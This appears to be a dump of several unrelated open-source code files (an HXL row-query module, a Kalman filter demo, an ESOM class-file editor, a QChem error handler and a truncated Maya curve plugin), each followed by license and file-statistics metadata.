return tuple(key) # make it into a tuple so that it's hashable
@property
def dictionary(self):
"""Return the row as a Python dict.
The keys will be HXL hashtags and attributes, normalised per HXL 1.1.
If two or more columns have the same hashtags and attributes, only the first will be included.
@return: The row as a Python dictionary.
"""
data = {}
for i, col in enumerate(self.columns):
key = col.get_display_tag(sort_attributes=True)
if key and (not key in data) and (i < len(self.values)):
data[key] = self.values[i]
return data
def __getitem__(self, index):
"""
Array-access method to make this class iterable.
@param index The zero-based index of a value to look up.
@return The value if it exists.
@exception IndexError if the index is out of range.
"""
return self.values[index]
def __str__(self):
"""
Create a string representation of a row for debugging.
"""
s = '<Row';
for column_number, value in enumerate(self.values):
s += "\n " + str(self.columns[column_number]) + "=" + str(value)
s += "\n>"
return s
class RowQuery(object):
"""Query to execute against a row of HXL data."""
def __init__(self, pattern, op, value, is_aggregate=False):
"""Constructor
@param pattern: the L{TagPattern} to match in the row
@param op: the operator function to use for comparison
@param value: the value to compare against
@param is_aggregate: if True, the value is a special placeholder like "min" or "max" that needs to be calculated
"""
self.pattern = TagPattern.parse(pattern)
self.op = op
self.value = value
# if the value is a formula, extract it
self.formula = None
result = re.match(r'^{{(.+)}}$', hxl.datatypes.normalise_space(value))
if result:
self.formula = result.group(1)
self.is_aggregate=is_aggregate
self.needs_aggregate = False
"""Need to calculate an aggregate value"""
if is_aggregate:
self.needs_aggregate = True
# calculate later
self.date_value = None
self.number_value = None
self._saved_indices = None
def calc_aggregate(self, dataset):
"""Calculate the aggregate value that we need for the row query
Substitute the special values "min" and "max" with aggregates.
@param dataset: the HXL dataset to use (must be cached)
"""
if not self.needs_aggregate:
logger.warning("no aggregate calculation needed")
return # no need to calculate
if not dataset.is_cached:
raise HXLException("need a cached dataset for calculating an aggregate value")
if self.value == 'min':
self.value = dataset.min(self.pattern)
self.op = operator.eq
elif self.value == 'max':
self.value = dataset.max(self.pattern)
self.op = operator.eq
elif self.value == 'not min':
self.value = dataset.min(self.pattern)
self.op = operator.ne
elif self.value == 'not max':
self.value = dataset.max(self.pattern)
self.op = operator.ne
else:
raise HXLException("Unrecognised aggregate: {}".format(value))
self.needs_aggregate = False
def match_row(self, row):
"""Check if a key-value pair appears in a HXL row"""
# fail if we need an aggregate and haven't calculated it
if self.needs_aggregate and not self.aggregate_is_calculated:
raise HXLException("must call calc_aggregate before matching an 'is min' or 'is max' condition")
# initialise is this is the first time matching for the row query
if self._saved_indices is None or self.formula:
# if it's a row formula, evaluate first
if self.formula:
value = hxl.formulas.eval.eval(row, self.formula)
else:
value = self.value
if self.pattern.tag == '#date':
try:
self.date_value = hxl.datatypes.normalise_date(value)
except ValueError:
self.date_value = None
try:
self.number_value = hxl.datatypes.normalise_number(value)
except ValueError:
self.number_value = None
self.string_value = hxl.datatypes.normalise_string(value)
# try all the matching column values
indices = self._get_saved_indices(row.columns)
for i in indices:
if i < len(row.values) and self.match_value(row.values[i], self.op):
return True
return False
def match_value(self, value, op):
"""Try matching as dates, then as numbers, then as simple strings"""
if self.date_value is not None:
try:
return op(hxl.datatypes.normalise_date(value), self.date_value)
except ValueError:
pass
if self.number_value is not None:
try:
return op(hxl.datatypes.normalise_number(value), self.number_value)
except:
pass
return self.op(hxl.datatypes.normalise_string(value), self.string_value)
def _get_saved_indices(self, columns):
"""Cache the column tests, so that we run them only once."""
# FIXME - assuming that the columns never change
self._saved_indices = []
for i in range(len(columns)):
if self.pattern.match(columns[i]):
self._saved_indices.append(i)
return self._saved_indices
@staticmethod
def parse(query):
"""Parse a filter expression"""
if isinstance(query, RowQuery):
# already parsed
return query
parts = re.split(r'([<>]=?|!?=|!?~|\bis\b)', hxl.datatypes.normalise_string(query), maxsplit=1)
pattern = TagPattern.parse(parts[0])
op_name = hxl.datatypes.normalise_string(parts[1])
op = RowQuery.OPERATOR_MAP.get(op_name)
value = hxl.datatypes.normalise_string(parts[2])
is_aggregate = False
# special handling for aggregates (FIXME)
if op_name == 'is' and value in ('min', 'max', 'not min', 'not max'):
is_aggregate = True
return RowQuery(pattern, op, value, is_aggregate)
@staticmethod
def parse_list(queries):
"""Parse a single query spec or a list of specs."""
if queries:
if not hasattr(queries, '__len__') or isinstance(queries, six.string_types):
# make a list if needed
queries = [queries]
return [hxl.model.RowQuery.parse(query) for query in queries]
else:
return []
@staticmethod
def match_list(row, queries=None, reverse=False):
"""See if any query in a list matches a row."""
if not queries:
# no queries = pass
return True
else:
# otherwise, must match at least one
for query in queries:
if query.match_row(row):
return not reverse
return reverse
@staticmethod
def operator_re(s, pattern):
"""Regular-expression comparison operator."""
return re.search(pattern, s)
@staticmethod
def operator_nre(s, pattern):
"""Regular-expression negative comparison operator."""
return not re.search(pattern, s)
@staticmethod
def operator_is(s, condition):
"""Advanced tests
Note: this won't be called for aggregate values like "is min" or "is not max";
for these, the aggregate will already be calculated, and a simple comparison
operator substituted by L{calc_aggregate}.
"""
if condition == 'empty':
return hxl.datatypes.is_empty(s)
elif condition == 'not empty':
return not hxl.datatypes.is_empty(s)
elif condition == 'number':
return hxl.datatypes.is_number(s)
elif condition == 'not number':
return not hxl.datatypes.is_number(s)
elif condition == 'date':
return (hxl.datatypes.is_date(s))
elif condition == 'not date':
return (hxl.datatypes.is_date(s) is False)
else:
raise hxl.HXLException('Unknown is condition: {}'.format(condition))
# Constant map of comparison operators
OPERATOR_MAP = {
'=': operator.eq,
'!=': operator.ne,
'<': operator.lt,
'<=': operator.le,
'>': operator.gt,
'>=': operator.ge,
}
# Static functions
def get_column_indices(tag_patterns, columns):
"""Get a list of column indices that match the tag patterns provided
@param tag_patterns: a list of tag patterns or a string version of the list
@param columns: a list of columns
@returns: a (possibly-empty) list of 0-based indices
"""
tag_patterns = TagPattern.parse_list(tag_patterns)
columns = [Column.parse(column) for column in columns]
indices = []
for i, column in enumerate(columns):
for pattern in tag_patterns:
if pattern.match(column):
indices.append(i)
return indices
# Extra static initialisation
RowQuery.OPERATOR_MAP['~'] = RowQuery.operator_re
RowQuery.OPERATOR_MAP['!~'] = RowQuery.operator_nre
RowQuery.OPERATOR_MAP['is'] = RowQuery.operator_is
# end
|
unlicense
| -8,416,026,671,488,264,000
| 38.114675
| 143
| 0.603247
| false
| 4.380029
| false
| false
| false
|
KDD-OpenSource/geox-young-academy
|
day-3/Kalman-filter_Mark.py
|
1
|
1494
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 11 10:10:24 2017
@author: Mark
"""
import numpy as np
import matplotlib.pyplot as plt
#Define functions
def model(state_0,A,B):
state_1 = A*state_0 + np.random.normal(0,B)
return state_1
state_null=np.random.normal(0,0.4)
def observation_function(state,R):
obs=state+np.random.normal(0,R)
return obs
def forecast(state_0,cov_0,A,B):
state_1=A*state_0
cov_1=A*cov_0*A+B
return state_1,cov_1
def analysis_formulas(state_1_hat,cov_1_hat,K,H,obs_0):
state_1 = state_1_hat - K*(H*state_1_hat - obs_0)
cov_1 = cov_1_hat - K*H*cov_1_hat
return state_1, cov_1
def kalman_gain(cov_1_hat,H,R):
K = cov_1_hat*H*(R+H*cov_1_hat*H)**(-1)
return K
#Initialize model parameters
A = 0.5
H = 1
B = 0.5
R = 0.1
lev = 100
#Sythetic Model
STATE_real = np.zeros(lev)
OBS_real = np.zeros(lev)
STATE_real[0] = np.random.normal(5,0.1)
OBS_real[0] = observation_function(STATE_real[0],R)
for i in range (1,lev-1):
STATE_real[i] = model(STATE_real[i-1],0.4,0.01)
OBS_real[i] = observation_function(STATE_real[i],R)
#Kalman-filter
STATE = np.zeros(lev)
COV = np.zeros(lev)
STATE[0] = state_null
COV[0] = B
for i in range (1,lev-1):
(state_hat,cov_hat) = forecast(STATE[i-1],COV[i-1],A,B)
K = kalman_gain(cov_hat,H,R)
(STATE[i],COV[i]) = analysis_formulas(state_hat,cov_hat,K,H,OBS_real[i])
plt.plot(STATE)
plt.plot(STATE_real)
|
mit
| 167,307,088,535,886,000
| 21.34375
| 76
| 0.613788
| false
| 2.270517
| false
| false
| false
|
Brazelton-Lab/lab_scripts
|
edit-esom-class-file.py
|
1
|
1891
|
#! /usr/bin/env python
"""
edit user-provided ESOM class file with new assignments in user-provided file
each line of user-provided file of new assignments should contain a data point number and a class number, separated by tabs
usage:
python edit-esom-class-file.py esom.cls new-assignments.tsv new-class-filename.cls
Copyright:
edit-esom-class-file.py Append user data to ESOM class file
Copyright (C) 2016 William Brazelton
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
cls_file = sys.argv[1]
user_file = sys.argv[2]
new_file = sys.argv[3]
# create dictionary of user-provided new assignments:
d = {}
with open(user_file) as user:
for line in user:
cols = line.split('\t')
data_point = cols[0].strip()
cls_number = cols[1].strip()
d[data_point] = cls_number.strip('\n')
# iterate through class file, writing new class file with new assignments:
with open(new_file,'w') as new:
with open(cls_file) as cls:
for line in cls:
if line[0] == '%': new.write(line)
else:
cols = line.split('\t')
if cols[0] in d: new.write(str(cols[0]) + '\t' + str(d[cols[0]]) + '\n')
else: new.write(line)
print 'WARNING: if you introduced new classes to this .cls file, you need to manually add them to the header of this new .cls file'
|
gpl-2.0
| -7,825,894,047,534,338,000
| 31.603448
| 131
| 0.710206
| false
| 3.501852
| false
| false
| false
|
xhqu1981/custodian
|
custodian/qchem/handlers.py
|
1
|
25246
|
# coding: utf-8
from __future__ import unicode_literals, division
import shutil
import time
"""
This module implements error handlers for QChem runs. Currently tested only
for B3LYP DFT jobs.
"""
import copy
import glob
import json
import logging
import os
import re
import tarfile
from pymatgen.core.structure import Molecule
from pymatgen.io.qchem import QcOutput, QcInput, QcTask
from custodian.custodian import ErrorHandler
__author__ = "Xiaohui Qu"
__version__ = "0.1"
__maintainer__ = "Xiaohui Qu"
__email__ = "xhqu1981@gmail.com"
__status__ = "Alpha"
__date__ = "12/04/13"
class QChemErrorHandler(ErrorHandler):
"""
Error handler for QChem Jobs. Currently tested only for B3LYP DFT jobs
generated by pymatgen.
"""
def __init__(self, input_file="mol.qcinp", output_file="mol.qcout",
ex_backup_list=(), rca_gdm_thresh=1.0E-3,
scf_max_cycles=200, geom_max_cycles=200, qchem_job=None):
"""
Initializes the error handler from a set of input and output files.
Args:
input_file (str): Name of the QChem input file.
output_file (str): Name of the QChem output file.
ex_backup_list ([str]): List of the files to backup in addition
to input and output file.
rca_gdm_thresh (float): The threshold for the prior scf algorithm.
If last deltaE is larger than the threshold try RCA_DIIS
first, else, try DIIS_GDM first.
scf_max_cycles (int): The max iterations to set to fix SCF failure.
geom_max_cycles (int): The max iterations to set to fix geometry
optimization failure.
qchem_job (QchemJob): the managing object to run qchem.
"""
self.input_file = input_file
self.output_file = output_file
self.ex_backup_list = ex_backup_list
self.rca_gdm_thresh = rca_gdm_thresh
self.scf_max_cycles = scf_max_cycles
self.geom_max_cycles = geom_max_cycles
self.outdata = None
self.qcinp = None
self.error_step_id = None
self.errors = None
self.fix_step = None
self.qchem_job = qchem_job
def check(self):
# Checks output file for errors.
self.outdata = QcOutput(self.output_file).data
self.qcinp = QcInput.from_file(self.input_file)
self.error_step_id = None
self.errors = None
self.fix_step = None
for i, od in enumerate(self.outdata):
if od["has_error"]:
self.error_step_id = i
self.fix_step = self.qcinp.jobs[i]
self.errors = sorted(list(set(od["errors"])))
return True
return False
def correct(self):
self.backup()
actions = []
error_rankings = ("pcm_solvent deprecated",
"autoz error",
"No input text",
"Killed",
"Insufficient static memory",
"Not Enough Total Memory",
"NAN values",
"Bad SCF convergence",
"Geometry optimization failed",
"Freq Job Too Small",
"Exit Code 134",
"Molecular charge is not found",
"Molecular spin multipilicity is not found"
)
e = self.errors[0]
for prio_error in error_rankings:
if prio_error in self.errors:
e = prio_error
break
if e == "autoz error":
if "sym_ignore" not in self.fix_step.params["rem"]:
self.fix_step.disable_symmetry()
actions.append("disable symmetry")
else:
return {"errors": self.errors, "actions": None}
elif e == "Bad SCF convergence":
act = self.fix_scf()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Geometry optimization failed":
act = self.fix_geom_opt()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "NAN values":
if "xc_grid" not in self.fix_step.params["rem"]:
self.fix_step.set_dft_grid(128, 302)
actions.append("use tighter grid")
else:
return {"errors": self.errors, "actions": None}
elif e == "No input text":
if "sym_ignore" not in self.fix_step.params["rem"]:
self.fix_step.disable_symmetry()
actions.append("disable symmetry")
else:
# This indicates something strange occured on the
# compute node. Wait for 30 minutes, such that it
# won't run too fast to make all the jobs fail
if "PBS_JOBID" in os.environ and ("edique" in os.environ["PBS_JOBID"]
or "hopque" in os.environ["PBS_JOBID"]):
time.sleep(30.0 * 60.0)
return {"errors": self.errors, "actions": None}
elif e == "Freq Job Too Small":
natoms = len(self.fix_step.mol)
if "cpscf_nseg" not in self.fix_step.params["rem"] or \
self.fix_step.params["rem"]["cpscf_nseg"] != natoms:
self.fix_step.params["rem"]["cpscf_nseg"] = natoms
actions.append("use {} segment in CPSCF".format(natoms))
else:
return {"errors": self.errors, "actions": None}
elif e == "pcm_solvent deprecated":
solvent_params = self.fix_step.params.pop("pcm_solvent", None)
if solvent_params is not None:
self.fix_step.params["solvent"] = solvent_params
actions.append("use keyword solvent instead")
else:
return {"errors": self.errors, "actions": None}
elif e == "Exit Code 134":
act = self.fix_error_code_134()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Killed":
act = self.fix_error_killed()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Insufficient static memory":
act = self.fix_insufficient_static_memory()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Not Enough Total Memory":
act = self.fix_not_enough_total_memory()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Molecular charge is not found":
return {"errors": self.errors, "actions": None}
elif e == "Molecular spin multipilicity is not found":
return {"errors": self.errors, "actions": None}
else:
return {"errors": self.errors, "actions": None}
self.qcinp.write_file(self.input_file)
return {"errors": self.errors, "actions": actions}
def fix_not_enough_total_memory(self):
if self.fix_step.params['rem']["jobtype"] in ["freq", "nmr"]:
ncpu = 1
if "-np" in self.qchem_job.current_command:
cmd = self.qchem_job.current_command
ncpu = int(cmd[cmd.index("-np") + 1])
natoms = len(self.qcinp.jobs[0].mol)
times_ncpu_full = int(natoms/ncpu)
nsegment_full = ncpu * times_ncpu_full
times_ncpu_half = int(natoms/(ncpu/2))
nsegment_half = int((ncpu/2) * times_ncpu_half)
if "cpscf_nseg" not in self.fix_step.params["rem"]:
self.fix_step.params["rem"]["cpscf_nseg"] = nsegment_full
return "Use {} CPSCF segments".format(nsegment_full)
elif self.fix_step.params["rem"]["cpscf_nseg"] < nsegment_half:
self.qchem_job.select_command("half_cpus", self.qcinp)
self.fix_step.params["rem"]["cpscf_nseg"] = nsegment_half
return "Use half CPUs and {} CPSCF segments".format(nsegment_half)
return None
elif not self.qchem_job.is_openmp_compatible(self.qcinp):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
else:
return None
def fix_error_code_134(self):
if "thresh" not in self.fix_step.params["rem"]:
self.fix_step.set_integral_threshold(thresh=12)
return "use tight integral threshold"
elif not (self.qchem_job.is_openmp_compatible(self.qcinp) and
self.qchem_job.command_available("openmp")):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
else:
if self.fix_step.params['rem']["jobtype"] in ["freq", "nmr"]:
act = self.fix_not_enough_total_memory()
return act
return None
elif self.qchem_job.current_command_name != "openmp":
self.qchem_job.select_command("openmp", self.qcinp)
return "openmp"
else:
if self.fix_step.params['rem']["jobtype"] in ["freq", "nmr"]:
act = self.fix_not_enough_total_memory()
return act
return None
def fix_insufficient_static_memory(self):
if not (self.qchem_job.is_openmp_compatible(self.qcinp)
and self.qchem_job.command_available("openmp")):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
elif not self.qchem_job.large_static_mem:
self.qchem_job.large_static_mem = True
# noinspection PyProtectedMember
self.qchem_job._set_qchem_memory(self.qcinp)
return "Increase Static Memory"
else:
return None
elif self.qchem_job.current_command_name != "openmp":
self.qchem_job.select_command("openmp", self.qcinp)
return "Use OpenMP"
elif not self.qchem_job.large_static_mem:
self.qchem_job.large_static_mem = True
# noinspection PyProtectedMember
self.qchem_job._set_qchem_memory(self.qcinp)
return "Increase Static Memory"
else:
return None
def fix_error_killed(self):
if not (self.qchem_job.is_openmp_compatible(self.qcinp)
and self.qchem_job.command_available("openmp")):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
else:
return None
elif self.qchem_job.current_command_name != "openmp":
self.qchem_job.select_command("openmp", self.qcinp)
return "Use OpenMP"
else:
return None
def fix_scf(self):
comments = self.fix_step.params.get("comment", "")
scf_pattern = re.compile(r"<SCF Fix Strategy>(.*)</SCF Fix "
r"Strategy>", flags=re.DOTALL)
old_strategy_text = re.findall(scf_pattern, comments)
if len(old_strategy_text) > 0:
old_strategy_text = old_strategy_text[0]
od = self.outdata[self.error_step_id]
if "Negative Eigen" in self.errors:
if "thresh" not in self.fix_step.params["rem"]:
self.fix_step.set_integral_threshold(thresh=12)
return "use tight integral threshold"
elif int(self.fix_step.params["rem"]["thresh"]) < 14:
self.fix_step.set_integral_threshold(thresh=14)
return "use even tighter integral threshold"
if len(od["scf_iteration_energies"]) == 0 \
or len(od["scf_iteration_energies"][-1]) <= 10:
if 'Exit Code 134' in self.errors:
# immature termination of SCF
return self.fix_error_code_134()
else:
return None
if od["jobtype"] in ["opt", "ts", "aimd"] \
and len(od["molecules"]) >= 2:
strategy = "reset"
elif len(old_strategy_text) > 0:
strategy = json.loads(old_strategy_text)
strategy["current_method_id"] += 1
else:
strategy = dict()
scf_iters = od["scf_iteration_energies"][-1]
if scf_iters[-1][1] >= self.rca_gdm_thresh:
strategy["methods"] = ["increase_iter", "rca_diis", "gwh",
"gdm", "rca", "core+rca", "fon"]
strategy["current_method_id"] = 0
else:
strategy["methods"] = ["increase_iter", "diis_gdm", "gwh",
"rca", "gdm", "core+gdm", "fon"]
strategy["current_method_id"] = 0
strategy["version"] = 2.0
# noinspection PyTypeChecker
if strategy == "reset":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
if self.error_step_id > 0:
self.set_scf_initial_guess("read")
else:
self.set_scf_initial_guess("sad")
if od["jobtype"] in ["opt", "ts"]:
self.set_last_input_geom(od["molecules"][-1])
else:
assert od["jobtype"] == "aimd"
from pymatgen.io.qchem import QcNucVeloc
from pymatgen.io.xyz import XYZ
scr_dir = od["scratch_dir"]
qcnv_filepath = os.path.join(scr_dir, "AIMD", "NucVeloc")
qc_md_view_filepath = os.path.join(scr_dir, "AIMD", "View.xyz")
qcnv = QcNucVeloc(qcnv_filepath)
qc_md_view = XYZ.from_file(qc_md_view_filepath)
assert len(qcnv.velocities) == len(qc_md_view.all_molecules)
aimd_steps = self.fix_step.params["rem"]["aimd_steps"]
elapsed_steps = len(qc_md_view.all_molecules)
remaining_steps = aimd_steps - elapsed_steps + 1
self.fix_step.params["rem"]["aimd_steps"] = remaining_steps
self.set_last_input_geom(qc_md_view.molecule)
self.fix_step.set_velocities(qcnv.velocities[-1])
self.fix_step.params["rem"].pop("aimd_init_veloc", None)
traj_num = max([0] + [int(f.split(".")[1])
for f in glob.glob("traj_View.*.xyz")])
dest_view_filename = "traj_View.{}.xyz".format(traj_num + 1)
dest_nv_filename = "traj_NucVeloc.{}.txt".format(traj_num + 1)
logging.info("Backing up trajectory files to {} and {}."
.format(dest_view_filename, dest_nv_filename))
shutil.copy(qc_md_view_filepath, dest_view_filename)
shutil.copy(qcnv_filepath, dest_nv_filename)
if len(old_strategy_text) > 0:
comments = scf_pattern.sub("", comments)
self.fix_step.params["comment"] = comments
if len(comments.strip()) == 0:
self.fix_step.params.pop("comment")
return "reset"
elif strategy["current_method_id"] > len(strategy["methods"])-1:
return None
else:
# noinspection PyTypeChecker
method = strategy["methods"][strategy["current_method_id"]]
if method == "increase_iter":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "rca_diis":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="rca_diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "gwh":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("gwh")
elif method == "gdm":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="gdm", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "rca":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="rca", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "core+rca":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="rca", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("core")
elif method == "diis_gdm":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis_gdm", iterations=self.scf_max_cycles)
self.fix_step.set_scf_initial_guess("sad")
elif method == "core+gdm":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="gdm", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("core")
elif method == "fon":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
natoms = len(od["molecules"][-1])
self.fix_step.params["rem"]["occupations"] = 2
self.fix_step.params["rem"]["fon_norb"] = int(natoms * 0.618)
self.fix_step.params["rem"]["fon_t_start"] = 300
self.fix_step.params["rem"]["fon_t_end"] = 300
self.fix_step.params["rem"]["fon_e_thresh"] = 6
self.fix_step.set_integral_threshold(14)
self.fix_step.set_scf_convergence_threshold(7)
else:
raise ValueError("fix method " + method + " is not supported")
strategy_text = "<SCF Fix Strategy>"
strategy_text += json.dumps(strategy, indent=4, sort_keys=True)
strategy_text += "</SCF Fix Strategy>"
if len(old_strategy_text) > 0:
comments = scf_pattern.sub(strategy_text, comments)
else:
comments += "\n" + strategy_text
self.fix_step.params["comment"] = comments
return method
def set_last_input_geom(self, new_mol):
for i in range(self.error_step_id, -1, -1):
qctask = self.qcinp.jobs[i]
if isinstance(qctask.mol, Molecule):
qctask.mol = copy.deepcopy(new_mol)
def set_scf_initial_guess(self, guess="sad"):
if "scf_guess" not in self.fix_step.params["rem"] \
or self.error_step_id > 0 \
or self.fix_step.params["rem"]["scf_guess"] != "read":
self.fix_step.set_scf_initial_guess(guess)
def fix_geom_opt(self):
comments = self.fix_step.params.get("comment", "")
geom_pattern = re.compile(r"<Geom Opt Fix Strategy>(.*)"
r"</Geom Opt Fix Strategy>",
flags=re.DOTALL)
old_strategy_text = re.findall(geom_pattern, comments)
if len(old_strategy_text) > 0:
old_strategy_text = old_strategy_text[0]
od = self.outdata[self.error_step_id]
if 'Lamda Determination Failed' in self.errors and len(od["molecules"])>=2:
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
if self.error_step_id > 0:
self.set_scf_initial_guess("read")
else:
self.set_scf_initial_guess("sad")
self.set_last_input_geom(od["molecules"][-1])
if od["jobtype"] == "aimd":
aimd_steps = self.fix_step.params["rem"]["aimd_steps"]
elapsed_steps = len(od["molecules"]) - 1
remaining_steps = aimd_steps - elapsed_steps + 1
self.fix_step.params["rem"]["aimd_steps"] = remaining_steps
if len(old_strategy_text) > 0:
comments = geom_pattern.sub("", comments)
self.fix_step.params["comment"] = comments
if len(comments.strip()) == 0:
self.fix_step.params.pop("comment")
return "reset"
if len(od["molecules"]) <= 10:
# immature termination of geometry optimization
if 'Exit Code 134' in self.errors:
return self.fix_error_code_134()
else:
return None
if len(old_strategy_text) > 0:
strategy = json.loads(old_strategy_text)
strategy["current_method_id"] += 1
else:
strategy = dict()
strategy["methods"] = ["increase_iter", "GDIIS", "CartCoords"]
strategy["current_method_id"] = 0
if strategy["current_method_id"] > len(strategy["methods"]) - 1:
return None
else:
method = strategy["methods"][strategy["current_method_id"]]
if method == "increase_iter":
self.fix_step.set_geom_max_iterations(self.geom_max_cycles)
self.set_last_input_geom(od["molecules"][-1])
elif method == "GDIIS":
self.fix_step.set_geom_opt_use_gdiis(subspace_size=5)
self.fix_step.set_geom_max_iterations(self.geom_max_cycles)
self.set_last_input_geom(od["molecules"][-1])
elif method == "CartCoords":
self.fix_step.set_geom_opt_coords_type("cartesian")
self.fix_step.set_geom_max_iterations(self.geom_max_cycles)
self.fix_step.set_geom_opt_use_gdiis(0)
self.set_last_input_geom(od["molecules"][-1])
else:
raise ValueError("fix method" + method + "is not supported")
strategy_text = "<Geom Opt Fix Strategy>"
strategy_text += json.dumps(strategy, indent=4, sort_keys=True)
strategy_text += "</Geom Opt Fix Strategy>"
if len(old_strategy_text) > 0:
comments = geom_pattern.sub(strategy_text, comments)
else:
comments += "\n" + strategy_text
self.fix_step.params["comment"] = comments
return method
def backup(self):
error_num = max([0] + [int(f.split(".")[1])
for f in glob.glob("error.*.tar.gz")])
filename = "error.{}.tar.gz".format(error_num + 1)
logging.info("Backing up run to {}.".format(filename))
tar = tarfile.open(filename, "w:gz")
bak_list = [self.input_file, self.output_file] + \
list(self.ex_backup_list)
for f in bak_list:
if os.path.exists(f):
tar.add(f)
tar.close()
def as_dict(self):
return {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"input_file": self.input_file,
"output_file": self.output_file,
"ex_backup_list": tuple(self.ex_backup_list),
"rca_gdm_thresh": self.rca_gdm_thresh,
"scf_max_cycles": self.scf_max_cycles,
"geom_max_cycles": self.geom_max_cycles,
"outdata": self.outdata,
"qcinp": self.qcinp.as_dict() if self.qcinp else None,
"error_step_id": self.error_step_id,
"errors": self.errors,
"fix_step": self.fix_step.as_dict() if self.fix_step else None}
@classmethod
def from_dict(cls, d):
h = QChemErrorHandler(input_file=d["input_file"],
output_file=d["output_file"],
ex_backup_list=d["ex_backup_list"],
rca_gdm_thresh=d["rca_gdm_thresh"],
scf_max_cycles=d["scf_max_cycles"],
geom_max_cycles=d["geom_max_cycles"])
h.outdata = d["outdata"]
h.qcinp = QcInput.from_dict(d["qcinp"]) if d["qcinp"] else None
h.error_step_id = d["error_step_id"]
h.errors = d["errors"]
h.fix_step = QcTask.from_dict(d["fix_step"]) if d["fix_step"] else None
return h
|
mit
| -107,415,132,109,779,500
| 44.735507
| 90
| 0.528202
| false
| 3.812443
| false
| false
| false
|
sergeneren/anima
|
anima/env/mayaEnv/plugins/closestPointOnCurve.py
|
1
|
8872
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, Anima Istanbul
#
# This module is part of anima-tools and is released under the BSD 2
# License: http://www.opensource.org/licenses/BSD-2-Clause
import sys
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
kPluginNodeTypeName = "spClosestPointOnCurve"
cpocPluginId = OpenMaya.MTypeId(0x00349)
# Node definition
class closestPointOnCurve(OpenMayaMPx.MPxNode):
# the plugs
aInCurve = OpenMaya.MObject()
aInPosition = OpenMaya.MObject()
aOutPosition = OpenMaya.MObject()
aOutPositionX = OpenMaya.MObject()
aOutPositionY = OpenMaya.MObject()
aOutPositionZ = OpenMaya.MObject()
aOutNormal = OpenMaya.MObject()
aOutNormalX = OpenMaya.MObject()
aOutNormalY = OpenMaya.MObject()
aOutNormalZ = OpenMaya.MObject()
aOutParam = OpenMaya.MObject()
def __init__(self):
OpenMayaMPx.MPxNode.__init__(self)
def compute(self, plug, dataBlock):
if plug == closestPointOnCurve.aOutPosition or plug == closestPointOnCurve.aOutParam:
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInCurve)
inputAsCurve = dataHandle.asNurbsCurve()
#if not inputAsCurve.hasFn(OpenMaya.MFn.kNurbsCurve):
# return OpenMaya.kUnknownParameter
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInPosition)
inPositionAsFloat3 = dataHandle.asFloat3()
inPosition = OpenMaya.MPoint(
inPositionAsFloat3[0],
inPositionAsFloat3[1],
inPositionAsFloat3[2]
)
# connect the MFnNurbsCurve
# and ask the closest point
nurbsCurveFn = OpenMaya.MFnNurbsCurve(inputAsCurve)
# get and set outPosition
outParam = OpenMaya.MScriptUtil()
outParam.createFromDouble(0)
outParamPtr = outParam.asDoublePtr()
# get position and paramater
outPosition = nurbsCurveFn.closestPoint(
inPosition, True, outParamPtr, 0.001, OpenMaya.MSpace.kWorld
)
outputHandle = dataBlock.outputValue(
closestPointOnCurve.aOutPosition
)
outputHandle.set3Float(outPosition.x, outPosition.y, outPosition.z)
# get and set outNormal
#outNormal = nurbsCurveFn.normal(parameter, OpenMaya.MSpace.kWorld)
#outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutNormal)
#outputHandle.set3Float(outNormal.x, outNormal.y, outNormal.z)
#outputHandle.set3Float(0, 1, 0 )
# get and set the uvs
outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutParam)
#outputHandle.setFloat(OpenMaya.MScriptUtil(outParamPtr).asDouble())
outputHandle.setFloat(OpenMaya.MScriptUtil.getDouble(outParamPtr))
dataBlock.setClean(plug)
else:
return OpenMaya.kUnknownParameter
# creator
def nodeCreator():
